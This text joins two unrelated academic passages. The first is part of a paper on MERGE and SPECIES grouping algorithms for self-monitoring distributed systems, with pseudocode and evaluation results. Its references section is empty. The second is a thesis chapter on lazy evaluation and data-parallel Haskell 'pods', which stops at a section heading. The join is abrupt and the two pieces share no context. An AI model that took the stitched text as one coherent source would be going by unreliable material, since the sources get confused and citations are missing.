Let us consider an example where $m$ is $2$, i.e. groups of minimum size $3$ are formed. In Figure 2(a) two groups are examined, one consisting of Nodes 1 and 2, where Node 1 is the leader, and the other group consisting only of Node 3. Node 3 requests the group of Node 1 to merge. After the merge process a new group is formed with exactly 3 members, and Node 1 is the leader of that group. Merge requests are never denied by leaders. Thus, as can be seen in Figure 2(b), it is possible that groups emerge which have more than the desired $m + 1$ members.
If groups become greater than or equal to $2 \cdot (m + 1)$ in size, as illustrated in Figure 3, a split is performed, resulting in two monitoring groups which both have at least $m + 1$ members, which is enough to stop active merging activities. Thus the resulting group sizes of the MERGE algorithm are always between $m + 1$ and $2 \cdot (m + 1) - 1$. In Algorithm 2, the described grouping algorithm is formalised as pseudocode. Please note that only the most interesting parts of the algorithm are presented, due to space limitations. For instance, the notification of group members when the group has changed has been omitted.

![Figure 2: Merge scenarios](image)

![Figure 3: Merge and consecutive split](image)

**Algorithm 2**

```
MERGE
 1: id          ▷ the id of this node
 2: m           ▷ minimum number of surveillants
 3: N           ▷ set of known nodes
 4: G = {id}    ▷ set of group members
 5: l = id      ▷ leader, initially set to the node's own id
 6: wr = F      ▷ whether the node is waiting for a response
 7:
 8: loop
 9:   if received message msg from n then
10:     if type of msg is 'request' then
11:       if id = l then
12:         if wr then send ('waiting', id) to n
13:         else
14:           if |G| + |msg.G| ≥ 2·(m+1) then
15:             H = choose ⌈(|G| + |msg.G|)/2⌉ − |msg.G| group members to hand over
16:             send ('handover', H) to n
17:           else
18:             G = G ∪ msg.G
19:             send ('ack', G) to all G \ {id}
20:           end if
21:         end if
22:       else
23:         send ('non-leader', G) to n
24:       end if
25:     else if type of msg is 'ack' then
26:       l = n
27:       G = msg.G
28:       wr = F
29:     else if type of msg is 'handover' then
30:       G = G ∪ msg.H
31:       wr = F
32:     else if type of msg is 'non-leader' then
33:       store the information that n is no leader
34:       wr = F
35:     else if type of msg is 'waiting' then
36:       affects the selection of the most suitable node
37:       wr = F
38:     end if
39:   else
40:     if id = l ∧ |G| < m + 1 then
41:       select most suitable node n out of N \ {id}
42:       send ('request', G) to n
43:       wr = T
44:     end if
45:   end if
46: end loop
```

### 4.3 Species

Like the MERGE algorithm, SPECIES also installs closed monitoring groups. It is based on the existence of two species: leader and non-leader. Leaders are group managers, and each group contains exactly one leader. Non-leaders contact the most suitable leader, trying to join its group. Which species a node belongs to is determined randomly and depends on the value of $m$.

Consider a network consisting of $n$ nodes. The optimal number of leaders is $\frac{n}{m+1}$, as the following example illustrates: within a small network of 12 nodes, closed monitoring groups need to be installed with $m = 2$, i.e. two surveillants per node or groups of size three. The optimal case for that are four groups of size three. Thus $\frac{n}{m+1} = \frac{12}{3} = 4$ leaders are needed, which the non-leaders can join. Therefore, the SPECIES algorithm selects every node as leader with probability $\frac{1}{m+1}$ and as non-leader otherwise. As it is worse to have too many leaders than too few, the probability of a node becoming a leader can be adjusted to approach the optimal balance in the number of leaders and non-leaders. Thus, if a leader recognises that there are too many leaders, it can toggle its species and transform into a non-leader. Vice versa, if nodes cannot find leaders to join, they transform into a leader with a certain probability.

The network shown in Figure 4(a) contains too many leaders; in this case $m = 3$, which means groups of sizes of at least 4 need to be formed. However, this is not possible in this example. If no non-leader joins the groups smaller than 4, their leaders try to contact other leaders in order to find groups with enough members to poach some non-leaders. If this also fails, leaders transform to non-leaders with a certain probability. This happens with Node 7 in this example.
After that transformation a valid grouping is possible. Figure 4(b) shows the contrary situation, where too few leaders are available, in this case even none. If non-leaders are unable to find any leader, they become a leader with a certain probability. There are two ways in which non-leaders join a group. If they do not belong to a group yet, they themselves take care of finding a group and joining it. Leaders controlling an undersized group try to find oversized groups and ask their leaders to hand over members that are not needed. In Algorithm 3, the most important parts of SPECIES are formalised as pseudocode. After the introduction of the proposed grouping algorithms, an evaluation is provided in the following section.

![Figure 4: Species scenarios](image)

**Algorithm 3**

```plaintext
SPECIES
 1: id          ▷ the id of this node
 2: m           ▷ minimum number of surveillants
 3: N           ▷ set of known nodes
 4: G = {id}    ▷ set of group members
 5: l = id with probability 1/(m+1), otherwise undefined
 6: wr = F      ▷ whether the node is waiting for a response
 7: loop
 8:   if received message msg from n then
 9:     if type of msg is 'request' then
10:       if id = l then
11:         G = G ∪ {n}
12:       end if
13:     else if type of msg is 'handover-request' then
14:       if id = l then
15:         if wr then
16:           send ('waiting', id) to n
17:         else
18:           x = min(|msg.G|, |G| − (m + 1))
19:           H = choose x group members to hand over
20:           send ('handover', H) to n
21:         end if
22:       else
23:         forward the message to a random node
24:       end if
25:     else if type of msg is 'handover' then
26:       G = G ∪ msg.H
27:       wr = F
28:     else if type of msg is 'chgspecies' then
29:       if id = l then
30:         G = G ∪ msg.G
31:       else
32:         forward the message to a random node
33:       end if
34:     else if type of msg is 'waiting' then
35:       affects the selection of the most suitable node
36:       wr = F
37:     end if
38:   else
39:     if id ≠ l ∧ |G| ≤ 1 then
40:       select most suitable leader n out of N
41:       send ('request', G) to n
42:       l = n
43:     end if
44:     if id = l ∧ |G| < m + 1 then, with probability 25%:
45:       if another suitable leader n is known then
46:         send ('handover-request', G) to n
47:       else if no leader can hand over nodes then
48:         change species to non-leader
49:         l = undefined
50:         send ('chgspecies', G) to a random node
51:       end if
52:     end if
53:     if id ≠ l ∧ no leader is known then, with probability 25%:
54:       change species to leader
55:       l = id
56:     end if
57:   end if
58: end loop
```

5. EVALUATION

In this section an evaluation of the above introduced algorithms is provided. For the purpose of evaluating and testing, a toolkit has been implemented which is able to simulate distributed algorithms based on message passing. It is written in Java and allows the construction of networks consisting basically of nodes, channels which connect two nodes, and algorithms running on the nodes. As the simulation runs on one single computer, a random strategy selects the next node whose algorithm is executed partially. Thus, the asynchronous behaviour of distributed systems is covered. It is assumed that the communication channels do not drop messages and deliver them in the correct order.

The nodes of the monitoring network $Net = (N, M, s)$ used for the evaluation are theoretically arranged as a grid, as shown in Figure 5 for an example network consisting of 100 nodes. The nodes of the network are labelled with natural numbers which represent their IDs. Note that the algorithms are neither based on that fact nor take any advantage of it. The distance of two nodes $u, v$ within the grid determines their mutual monitoring ability.
Thus, the suitability has been set to the reciprocal value of the Euclidean distance of the nodes within the grid.

![Figure 5: Evaluation network of 100 nodes](image)

The evaluation network consists of 1000 nodes\(^1\), where all nodes are able to communicate with each other. However, in most evaluation scenarios the nodes only have sufficient information about a certain number of nodes to compute a suitability value. This models the concept that in many networks nodes do not know everything but have a limited view. The introduced grouping algorithms are evaluated within different scenarios. The evaluation focuses on the scalability of the establishment of monitoring relations, the optimality of the relations regarding the suitability metric, and the failure tolerance of a system if failure detectors are used together with the grouping approach. The evaluations have been conducted using different sets of parameters, like the values for the desired number of surveillants $m$ and the amount of information about other nodes. Each evaluation scenario has been replayed 1000 times and the results have been averaged.

Recall that a monitoring network $Net$ is represented as $(N, M, s)$, where $N$ is the set of nodes of a network, $M \subseteq N \times N$ is the monitoring relation, and $s$ is a function from $N \times N$ to a real value within $[0, 1]$. The task of a grouping algorithm is, given a positive integer $m < |N|$, to establish monitoring relations such that every node of the network is monitored by at least $m$ nodes. As suitability function $s(u, v)$, the reciprocal value of the Euclidean distance of the nodes $u$ and $v$ is used. At the beginning, the monitoring relation is empty, i.e., $M = \emptyset$. This means that the network is in a state where no monitoring relations are established yet. To model the fact that nodes usually do not have a complete view of the whole network, the value $\kappa$ describes the part of the network each node is aware of.
A value of $\kappa = 10$ means that each node has information about 10 randomly chosen nodes. In the following, the results of the conducted evaluations are presented.

5.1 Scalability

To establish monitoring relations, messages need to be sent. In the following, this overhead is evaluated for the proposed grouping algorithms. All experiments have been conducted according to the description given above. First, the scalability with regard to the network size is evaluated. In this experiment the number of desired surveillants $m$ is set to 5 while each node knows 50 other nodes, i.e., $\kappa = 50$. Figure 6 shows the results of this experiment, where the values on the x-axis stand for the network size and the average number of messages sent by each node is depicted on the y-axis.

![Figure 6: Scalability of grouping algorithms regarding network size ($\kappa = 50$)](image)

As $m$ is 5, each node executing the INDIVIDUAL algorithm needs 10 messages: 5 monitoring requests and 5 responses. MERGE needs fewer than 6 messages, SPECIES fewer than 4. The results indicate that all three algorithms can be classified as independent of the network size, as the nodes basically do not send more messages within a bigger network. The algorithm SPECIES performs even better in bigger networks. The reason for this behaviour is the random-driven determination of the species. The aim of that process is to achieve a division into leaders and non-leaders of a defined ratio; in general, the bigger the network, the better this ratio is met. Thanks to the independence of the overhead caused by the grouping algorithms from the network size, all introduced algorithms seem suitable to be applied within complex distributed systems. All following evaluations are conducted with a network size of 1000 nodes.

\(^1\)Except for the measurements of the scalability regarding the network size, where the number of nodes has been varied.
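The independence of INDIVIDUAL's per-node overhead from the network size can be illustrated with a small simulation. The sketch below is our own toy model (the paper's toolkit is written in Java, and the function name and node-selection details here are hypothetical): each node is simply charged one request and one response per surveillant.

```python
import random

def individual_messages_per_node(n_nodes, m, kappa):
    """Toy model of the INDIVIDUAL algorithm's overhead: every node asks
    m nodes to monitor it (m requests) and receives m responses, so the
    per-node message count is 2*m whatever the network size."""
    total = 0
    for node in range(n_nodes):
        # each node only knows kappa randomly chosen other nodes
        known = random.sample([v for v in range(n_nodes) if v != node],
                              min(kappa, n_nodes - 1))
        surveillants = known[:m]        # choose m monitors from that view
        total += 2 * len(surveillants)  # m requests + m responses
    return total / n_nodes

# For m = 5 the average is 10 messages per node, for any network size.
```
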
To evaluate the overhead with regard to the sizes of the formed groups, the message sending behaviour of the algorithms is compared using different values for the minimum group size \( m \in \{3, 4, \ldots, 20\} \), with \( \kappa = 100 \). Figure 7 shows the results of that experiment. It depicts the average number of sent messages on the y-axis; the x-axis stands for the different values of \( m \). The SPECIES algorithm manages to group with the fewest messages of the three algorithms; its number of sent messages is completely independent of the number of surveillants. INDIVIDUAL scales linearly with the number of surveillants. The number of messages for MERGE is strictly increasing, but grows more slowly than linearly. The three algorithms differ in the way they are able to meet the desired number of surveillants \( m \). As it is mandatory to install at least \( m \) monitoring relations per node, only values greater than or equal to \( m \) are possible for the actually resulting group sizes. Figure 8 shows the resulting number of surveillants in comparison to the value of \( m \). INDIVIDUAL manages to install exactly \( m \) surveillants per node. For closed monitoring groups it is a much harder problem to meet this condition exactly; MERGE and SPECIES typically form slightly larger groups in order to allow for a fast and robust grouping process. The next section examines the monitoring relations with respect to their suitability according to the suitability function.

5.2 Suitability

As stated in the specification, the algorithms are supposed to take the suitability of the nodes into account. This means the term

\[ \sum_{v \in N} \sum_{u \in S_v} s(u, v) \tag{1} \]

should be maximised. The average suitability within the evaluation network is about 0.09; this means a random grouping produces monitoring relations of about that value.
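The suitability function can be made concrete with a few lines of Python. This is an illustrative sketch: the mapping of node IDs onto grid coordinates (row by row, for an assumed grid width) is our own choice, as the paper only states that nodes are arranged as a grid and that $s$ is the reciprocal Euclidean distance.

```python
import math

def suitability(u, v, width):
    """s(u, v) = 1 / Euclidean distance of nodes u and v, with IDs laid
    out row by row on a grid of the given width (an assumption made for
    illustration only)."""
    ux, uy = u % width, u // width
    vx, vy = v % width, v // width
    d = math.hypot(ux - vx, uy - vy)
    return 1.0 / d if d > 0 else 0.0

# Direct neighbours reach the maximal suitability 1.0, diagonal
# neighbours 1/sqrt(2); far-apart nodes approach 0.
```
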
Figures 9 and 11 show the results of the experiments concerning the suitability of the algorithms for different values of \( \kappa \) (10 and 100). This parameter represents the size of the nodes' view of the network. The x-axis represents the number of surveillants per node, the y-axis depicts the average suitability of the formed groups based on Equation 1. For all algorithms, bigger group sizes cause lower values for the suitability. SPECIES and especially MERGE handle grouping with limited information very well, while INDIVIDUAL performs optimally in the case of full information \( (\kappa = 1000) \) about the network.

5.3 Failure tolerance

In this section, the gain of applying the proposed grouping techniques with respect to failure tolerance is investigated. To evaluate the failure tolerance of the monitoring relations, the following methodology is used: it is assumed that a certain percentage of randomly chosen nodes within the network fail simultaneously, i.e., they crash and do not recover. Using failure detectors, nodes monitor each other according to the monitoring relations installed by a grouping algorithm. It is assumed that failure detectors eventually detect the failure of a monitored node. An undetected failure is the failure of a node that is noticed by no other node; in this setting this is only possible if a node and all its surveillants fail simultaneously. The detection of a failure is the prerequisite of a subsequent repair or self-healing, respectively. If a node has no surveillant, its failure equals an undetected failure. If every node monitors all other nodes, only the complete failure of the whole network results in undetected failures; however, for more complex systems, this monitoring strategy typically introduces an excessive overhead. Before the evaluation results are presented, a short view on failure tolerance motivated by probability theory is given.
Let $X$ be the number of elements within a set, $Y \leq X$ the number of elements within this set possessing a feature $F$, and $x \leq X$ the number of elements which are randomly chosen from the set. The probability of exactly $k$ elements with feature $F$ being in the randomly chosen set is then

\[ \frac{\binom{Y}{k}\binom{X-Y}{x-k}}{\binom{X}{x}} \]

according to the hypergeometric distribution [8]. Consider a network $Net = (N, M, s)$ and a number of surveillants per node of $m < |N|$. If $\phi$ random nodes of the network fail, where $m + 1 \leq \phi \leq |N|$, the probability for the undetected failure of a certain node is

\[ \frac{\binom{m+1}{m+1}\binom{|N|-(m+1)}{\phi-(m+1)}}{\binom{|N|}{\phi}} = \frac{\binom{|N|-m-1}{\phi-m-1}}{\binom{|N|}{\phi}}. \]

If $\phi$ is lower than $m + 1$, the probability of an undetected failure is obviously 0. If, for instance, $\phi = 10\%$ of the nodes of a network $Net = (N, M, s)$ consisting of 100 nodes fail, i.e., $\phi = 10$, and each node is monitored by $m = 3$ nodes, then the probability for a certain node $\eta \in N$ to fail undetectedly is

\[ \frac{\binom{100-4}{10-4}}{\binom{100}{10}} = \frac{\binom{96}{6}}{\binom{100}{10}} \approx 5 \cdot 10^{-5}. \]

The following simulations have been conducted as before with a network $Net = (N, M, s)$ of 1000 nodes. Monitoring relations are established with all three proposed grouping algorithms and different values for $m$. It is measured how many undetected failures occur if a certain percentage $\phi$ of random nodes fails. Figure 12 presents the results for $\phi = 50\%$. The x-axis shows the average number of surveillants per node, the y-axis the number of undetected failures. With a number of surveillants of 15, a failure of every second node in the network does not result in any undetected node failures. These results can be used as a utility to choose an adequate value for \( m \), which is a balancing act between overhead and failure tolerance. The algorithm \textsc{Individual} performs best because it has no variance in the number of surveillants.
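The closed formula above is easy to check numerically. The following sketch (the function name is ours) evaluates the undetected-failure probability with Python's `math.comb` and reproduces the roughly $5 \cdot 10^{-5}$ of the worked example.

```python
from math import comb

def p_undetected(n, m, phi):
    """Probability that a fixed node and all m of its surveillants are
    among the phi simultaneously failing nodes (hypergeometric)."""
    if phi < m + 1:
        return 0.0
    return comb(n - m - 1, phi - m - 1) / comb(n, phi)

# |N| = 100, m = 3, phi = 10 (10% of the nodes) gives roughly 5.4e-5.
```
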
The parameter \( m \) exactly determines the resulting group size, i.e., the number of surveillants. For closed monitoring groups this number varies: the value of \( m \) only determines the minimum number of surveillants. Thus an average number of surveillants of, e.g., 10 does not exclude groups of lower sizes. Consider for example a network of 10 nodes arranged in two monitoring groups: in the first case two groups of size 5 (no variance), in the second case one group of size 4 and one group of size 6 (variance of 2). If only 4 nodes fail, undetected failures are possible in the latter case but not in the former. The variance of the group sizes thus impacts the number of undetected failures, where a low variance is better. \textsc{Individual} has no variance, \textsc{Species} has the highest variance, and \textsc{Merge}'s lies in between. The evaluation results reflect this fact.

6. CONCLUSIONS

In this work, the requirements for self-monitoring distributed systems are presented. The task is to autonomously install monitoring relations that enable self-monitoring distributed systems. The given formal problem statement is novel and takes suitability information into account. Three algorithms solving that problem are introduced and compared regarding their scalability, their suitability, and the failure tolerance they provide. The algorithms are tailored to install monitoring relations very quickly, which is important for reliable distributed systems.

7. REFERENCES
Chapter 3

LAZINESS AND PARALLEL DATA STRUCTURES

3.1 Introduction

There are two routes into parallelism: one is through intra-processor parallelism (e.g. replicating functional units within a processor) and the other is through inter-processor parallelism (replicating processors). The advantage of intra-processor parallelism is that it does not require a shift in programming style: the computer still looks like a normal von Neumann machine. The processor uses internal concurrency to boost performance, e.g. multiple instructions can be started at each clock cycle, or, at the bit level, each bit of a word can be operated on concurrently. To use this form of parallelism only the compilers need be modified, so that instructions in the sequential program are scheduled to avoid the processor stalling. The alternative to intra-processor parallelism is inter-processor parallelism. Here, multiple processors are combined using some interconnection network to form a parallel computer. The combined processors either have local per-processor memories or one large shared memory. Either way, each processor can be viewed as a single computer. The big advantage of parallel computers is that the component complexity is kept low: collections of simpler processors are easier and cheaper to build than one very complicated processor. Increasingly the two approaches are being combined as intra-

In order to reason formally about parallel program behaviour, formal models of synchronisation and communication are needed. In the most general models, programs are described as a set of interacting sequential processes (with encapsulated control and state). The interfaces between the sequential processes are a well-defined set of communication channels, with data being sent down the communication channels and results received in a programmed exchange. Each task can be viewed as a black box with input channels and output channels defining its interface.
3.1.2 Map function

The essence of data-parallelism is an $O(1)$ map function. A data-parallel interpretation of \((\text{map } f)\) applies \(f\) to every element of a parallel data structure all at the same time. This model is at odds with the conventional interpretation of map on lists. Although map \(f\) can be interpreted as applying \(f\) to every element of a list, in a non-strict language the function applications only occur at those elements required by a subsequent computation. To highlight this dichotomy we investigate the potential for data-parallelism on lazy lists and monolithic arrays. The function map \((+1)\) in exList of figure 3.1 could be applied in a data-parallel manner to each element of the list \(xs\), because the surrounding sum consumes all of the resulting list. As a general rule, if a map expression is enclosed by a function that is both head and tail strict [75], then data-parallel evaluation of the map is feasible. If we aim to implement this model on a massively parallel SIMD machine, we would have to implement the list as a data structure whose elements occupy consecutive memory locations. This is at odds with the conventional run-time representation of lists using pointers. If lists at first seem unsuitable for data-parallel evaluation, monolithic arrays [38] provide a more obviously practical framework. Figure 3.1 defines the Haskell array-mapping function amap. The function array creates a monolithic array: the first argument defines the bounds of the array, and the second defines a list of associations of the form ‘index:=value’ where the contents of the array at index are defined to be value. The array function is strict in both the bounds and the indices of the association list, but not in the indexed values. As was seen to be the case with map and lists, the non-strictness associated with the values of array elements interacts awkwardly with data-parallel evaluation.
For example, because of the properties of take and amap, the reciprocal function (1/) is only applied to the first eight elements of arr. We can see from the definition of exArray that it is possible to determine at compile-time that only the first eight elements of arr are required; does this form a general rule?

```
> map f []     = []
> map f (x:xs) = f x : map f xs
>
> exList xs = sum (map (+1) xs)

> amap f a = array b [i := f (a!i) | i <- range b]
>   where b = bounds a
>
> exArray arr = sum (take 8 (elems (amap (1/) arr)))
```

Figure 3.1: List & Array Map

We propose an evaluation mechanism that combines the desirable features of the lazy and strict evaluation of map. Whenever a map-like computation is forced, multiple elements of the parallel object being mapped evaluate their results synchronously; however, the mechanism retains non-strict semantics. In the discussion so far, non-strictness and data-parallelism have been mixed only if it is possible to determine at compile-time how much of the object resulting from a map-like computation is required. The model we propose delays this choice to run-time, when we know exactly what needs to be evaluated. We maintain a run-time data structure called the aim describing those elements that are required to be evaluated. Whenever a map-like computation is forced, the function applications of the map are evaluated in parallel at those elements defined by the aim. map can therefore be implemented as $O(1)$ whilst retaining all the benefits of non-strict evaluation.

3.2 An introduction to the `aim of evaluation'

3.2.1 The print-eval loop: aim = multiple points of interest

The concept of the aim of evaluation arose from the concern that the print-eval loop of a non-strict language unnecessarily serialises and throttles potential parallelism within a program. In its simplest form, the print-eval loop consumes a list of characters by outputting them one-by-one to the screen.
In a non-strict language, the implementation should do only just enough evaluation to generate each character in turn. Given the expression:

\[ \text{concat (map (integerToString . (+1)) [1..])} \]

the print-eval loop will try to print the first character of the list denoted by the expression. This will force the production of the first element of the natural numbers, and then map will add one to the value forced. The resulting number 2 is converted into a string, and finally the print-eval loop can print its first character. The aim of evaluation provides the programmer with a mechanism for explicitly parallelising the print-eval loop. The idea is that instead of having a single point of interest at the head of the output stream, the programmer controls multiple points of interest. For example, in a sequential setting the expression take 8 ['a'..'z'] prints the characters abcdefgh one after the other. In a parallel scenario, the same effect can be achieved by creating a parallel array, with a lower bound of 1, containing the characters 'a' through to 'z'. If the programmer sets the aim to identify array elements 1 through to 8, and evaluates the array of characters, then the first eight elements of the array can be evaluated in parallel.

3.2.2 The aim as an abstraction of a SIMD activity mask

When using a SIMD machine, computation is expressed in terms of parallel operations on monolithic array-like data structures. These array-like structures are often distributed across the processors of a machine; in a typical mapping each processor contains a single element of an array. When programming in a language for a SIMD machine, the programmer is aware of the notion of an active set or activity mask which controls where computation occurs. For example, given two integer arrays to be divided element-wise, if any element of the divisor contains zero, then an error will be raised for the entire computation.
Conventional imperative SIMD languages overcome this problem by setting the activity mask before troublesome statements are executed. In the context of division by zero, the activity mask would be set at those processors of the divisor that do not contain a zero, and then the division can be safely executed in parallel. From a machine perspective, the activity mask manifests itself in the hardware as a register in each processor which controls whether the processor should be part of the lock-step evaluation of a SIMD program. The activity mask used by the imperative SIMD programmer is therefore an abstraction of the activity registers of each of the processors of a SIMD machine, and the aim of evaluation is an abstraction of the activity mask.

3.2.3 An operational view of the aim of evaluation

The aim forms an integral part of the data-parallel evaluation mechanism we propose. It is continually recalculated to identify just those elements of an array that are needed during each step of evaluation. We illustrate this recalculation by considering four typical scenarios where the aim plays an important role in data-parallel evaluation. In the discussion that follows, terms of the form expr represent arbitrary expressions which, when evaluated, produce an array that is distributed throughout the processors of a parallel machine. The functions mapArray, zipWithArray, and filterArray are analogous to the standard list-processing functions with similar names. However, the marked difference is that these functions require parallel arrays as arguments, and produce arrays as results.

The aim stays the same

The evaluation of:

\[ \text{mapArray integerToString expr} \]

where expr evaluates to an array, produces an array in which each processor contains a textual representation of an integer.
If evaluation only requires a subset of the array elements, then before the map can be applied, that same subset of elements from expr will need to be evaluated. Therefore, given an aim α for the entire computation, the lock-step evaluation will start by evaluating expr with the aim α, and then the same set of processors will have their integer contents converted into a string. In general, map transmits the aim unchanged.

Splitting the aim of evaluation

Where there are different control paths within a program, the aim may change, splitting itself to mirror the control paths. Considering a single route through the tree of all the different control paths, the aim will steadily narrow during each step of a map computation. For example, zipWithArray can be used to map the four-argument choice function across two integer arrays:

```
let choice :: (Int->Int) -> (Int->Int) -> Int -> Int -> Int
    choice f g 0 y = g y
    choice f g x y = f x
in  zipWithArray (choice (+1) (+2)) exprA exprB
```

In a data-parallel setting, the pattern matching involved with the evaluation of choice can be performed in parallel on the entirety of both exprA and exprB. If the above let-expression is evaluated with aim α, then because of the pattern matching of 0 required by the first equation, those processors identified by the aim α from the array exprA will be evaluated in parallel. The lock-step evaluation of zipWithArray (choice (+1) (+2)) will then proceed by identifying those processors within α that matched the pattern 0: they make up a new aim β (a subset of α) which is used in the parallel evaluation of g y. As g is bound to the strict function (+2), all of the ys (namely the array exprB) within the aim β will need to be evaluated, and then the computations of (+2) y can all occur in parallel.
Once the first equation has completed evaluation, those elements of exprA that did not match the first equation can proceed to evaluate the second, default equation. Again a narrowing of the aim will occur, where a new aim α − β is created that identifies those elements of α that did not match against the pattern 0. This aim will then be used to evaluate the expression f x. As f is instantiated to the increment function (+1), all the xs (namely the array exprA) will be evaluated with the aim α − β. Due to the initial pattern matching of choice, the array exprA will already be evaluated at a superset of the aim required (\(\alpha - \beta \subseteq \alpha\)). Evaluation of exprA therefore finishes immediately, and then \((+1)\ x\) occurs in parallel at processors identified by \(\alpha - \beta\). Finally, the evaluation of choice is completed by merging the arrays produced by the two pattern-matching equations. In summary, the distinguishing feature of this map-like evaluation is that if the function being mapped has \(n\) different pattern-matching equations (i.e., control paths), then the aim used by the map is split into \(n\) pieces. Each of the new aims models the processors which matched a particular pattern-matching equation. All of the right-hand sides of the equations are then evaluated sequentially, one after the other, with the newly created aims. (This model of evaluating pattern-matching equations is aimed towards the lock-step evaluation required by a SIMD machine. Other machine models would use a scheme better suited to their own architectural features. For example, a MIMD machine could create the aim for each of the control paths, and then evaluate all the right-hand sides concurrently.) The resulting arrays are finally merged together to produce an array that encapsulates the entire computation.
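The splitting step described above can be modelled on a small scale. The sketch below is our own illustration (the thesis gives no concrete representation for aims): an aim is a list of processor indices, and matching against the pattern 0 partitions it into β and α − β.

```haskell
import Data.List (partition)

-- An aim as the set of processor indices that must be evaluated
-- (an illustrative encoding, not the thesis's implementation).
type Aim = [Int]

-- Split an aim alpha against an array of (index, value) processors:
-- indices whose element matches 0 form the aim beta for the first
-- equation of 'choice'; the remainder, alpha - beta, drives the
-- default equation.
splitAim :: Aim -> [(Int, Int)] -> (Aim, Aim)
splitAim alpha arr = partition matchesZero alpha
  where matchesZero i = lookup i arr == Just 0

-- The choice function from the text.
choice :: (Int -> Int) -> (Int -> Int) -> Int -> Int -> Int
choice _ g 0 y = g y
choice f _ x _ = f x
```
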
Growing the aim

There are often circumstances in which the aim dramatically grows to mirror the data dependencies that often occur within function definitions. For example, if the first ten elements of the array produced by the following expression are required:

\[ \text{filterArray even expr} \]

then it would be incorrect to evaluate expr at the same ten processors. What is required is to evaluate expr just enough such that its first ten even elements are accounted for. Therefore, interwoven with the filtering will be a "growing" of the aim such that it encapsulates just enough of expr to provide the ten elements initially requested. The steps involved in the evaluation of filterArray are: (1) the aim is set for the filter expression as a whole; (2) filterArray grows the aim (not necessarily one element at a time), evaluating expr until all the elements that are to be filtered are encapsulated; (3) the evaluated elements of expr are finally collected into an array in which the filtered elements occupy consecutive array elements. In the definition of a parallel filterArray, growing of the aim is controlled by a send parallel data-communication primitive. Given an array to be filtered, parallel filterArray calculates a destination for the contents of each processor, such that the resulting array contains just the right elements from the original. The send used to perform this communication implicitly controls steps 2 and 3 outlined above.

Narrowing the aim

The final example highlights that many processors can often share evaluation of a common set of processors. Consider the array denoted by the sequence:

\[ B = [A_1;\ A_2;\ A_2;\ A_3;\ A_3;\ A_3;\ \ldots] \]

in which the first element contains the first element from array A; the next two elements are from the second element of A; the next three elements are from the third element of A, etc.
If the first 10 elements of B are to be evaluated, then only 4 elements of A will be required. Similarly, 5151 elements from B will only require 101 elements from A. The effect of each processor selecting the contents of other processors, where there is the potential for many processors accessing a common processor, is achieved using a fetching parallel data-communication primitive. Like the send communication briefly mentioned above, the implementation of fetch changes the aim such that only the processors which have their contents "fetched" are evaluated. This thesis is concerned with the implementation of the aim such that it models the four features outlined above. Unfortunately the presentation of the material will be in a form that bears little similarity to that given here. One reason for this is that so far we have considered the interaction of the aim with Haskell functions. In contrast, the approach adopted in the rest of the thesis is a layered one that translates Haskell into a sugared form of the lambda calculus. The benefit of this approach is that it is easier to reason about the aim of evaluation, and the mechanics of evaluation with the aim, in terms of transformations and ultimately the evaluation of the lambda calculus.

3.2.4 Data-parallel non-strict glue

Given that the aim is one way of achieving non-strict semantics within a data-parallel setting, we propose that the aim enables existing techniques that utilise non-strictness to be carried through to a parallel environment. In a combinatorial search problem, Hughes showed how the generation of the search space can be decoupled from the process that searches the generated space. This decoupling is achieved by defining a function that generates a potentially infinite search space, and a different function that traverses the generated data structure looking for solutions to the combinatorial search problem.
When the two functions are composed, non-strictness ensures that just those parts of the search space required to find a solution are generated; non-strictness therefore provides a special kind of "glue" for combining sub-problems. Using the aim of evaluation as a method of achieving data-parallelism with non-strict semantics, we can utilise the same technique in a data-parallel setting. Because of non-strict semantics it is possible for data-parallel arrays to be potentially infinite. A generation function for the search problem can therefore be defined to distribute the search space throughout the consecutive elements of a potentially infinite array. If a consumer function identifies those points within the search space that are valid combinatorial solutions, then the valid solutions can be filtered to occupy consecutive locations of a solution array. Just as Hughes observed, the generation and consumption of the search space can be achieved by composing the producer and consumer functions together. If only the first solution is required, then the aim would be set to the first element, and the evaluation would grow the aim, effectively searching for the single solution within the search space in parallel. The benefit of using the aim of evaluation, however, is that if 50 solutions are required, the aim would be set to elements 1 through to 50 of the parallel solution array, and because of the multiple points of interest, the fifty solutions will be found in parallel. The expansion of the search space for each of the fifty solutions will therefore occur concurrently, whilst the entire computation retains non-strict semantics.

3.3 PODS

All parallelism in Data Parallel Haskell (DPHaskell) is achieved by operations on parallel data structures called pods. A pod represents a collection of index/value pairs, where each index uniquely identifies a single element of a pod.
As pods are an abstraction of the processing elements of a data-parallel machine, we choose to collect the index/value pairs into a data type we call a "processor". For example, (|42; "DON'T PANIC"|) represents a single processor of a one-dimensional pod (a vector), where (| and |) are used as delimiters in the same way as brackets are used to delimit a tuple. The expression determines that the value of the pod at the position identified by 42 is "DON'T PANIC". At the beginning of our work, we envisaged higher-dimensional pods, characterised by multiple indices to identify a single element within the pod. The general form of a processor would therefore be (|e₁, …, eₖ; e|) where k ≥ 1, and the sequence of expressions e₁ to eₖ would uniquely identify an element in a k-dimensional parallel object; e would describe the data in that element. As a consequence of having multi-dimensional parallel objects, the name pod is derived from the acronym Parallel Objects with arbitrary Dimensions. However, because the use of pods is tightly coupled with the pod comprehension notation presented below, and we have found that ambiguities arise in the semantics of higher-dimensional pod comprehensions, we restrict pods to a single dimension. A pod contains a sequence of uniquely labelled processors, any of which may be missing. The empty pod, which contains no processors, does not necessarily consume no resources when an implementation maps a pod to the real processors of a data-parallel machine. At the language level we do not specify how pods should be implemented in terms of either sparse or dense parallel data structures. Therefore the empty pod (or, in keeping with our analogy, a mange-tout) may consume the same resources (i.e., space) as a pod in which every processor is defined. In summary, pods are different from ordinary monolithic arrays because they contain holes where processors are missing.
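A minimal executable model of these one-dimensional pods, assuming an association-list encoding of our own (the thesis deliberately leaves the representation open), looks as follows; holes are simply absent indices.

```haskell
-- A pod as a sequence of index/value "processors"; missing indices
-- are the holes discussed above.  Illustrative encoding only.
type Pod a = [(Int, a)]

-- The processor at a given index; Nothing marks a hole.
podAt :: Pod a -> Int -> Maybe a
podAt pod i = lookup i pod

-- The empty pod, the "mange-tout": no processor is defined.
mangeTout :: Pod a
mangeTout = []

-- Example: the single-processor vector (|42; "DON'T PANIC"|).
dontPanic :: Pod String
dontPanic = [(42, "DON'T PANIC")]
```
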
Pods also differ from arrays in a more fundamental way: their size is unbounded and potentially infinite. Because of the semantics of a non-strict language, where evaluation only occurs at the point that it is required, the evaluation of a finite portion of an expression that denotes an infinite object is possible. In an implementation, a dense finite object is created, with a size equal to the difference between the smallest and largest indices defined by the aim. If a pod is re-evaluated with a different aim, then the representation of the pod grows accordingly.

3.4 POD comprehensions
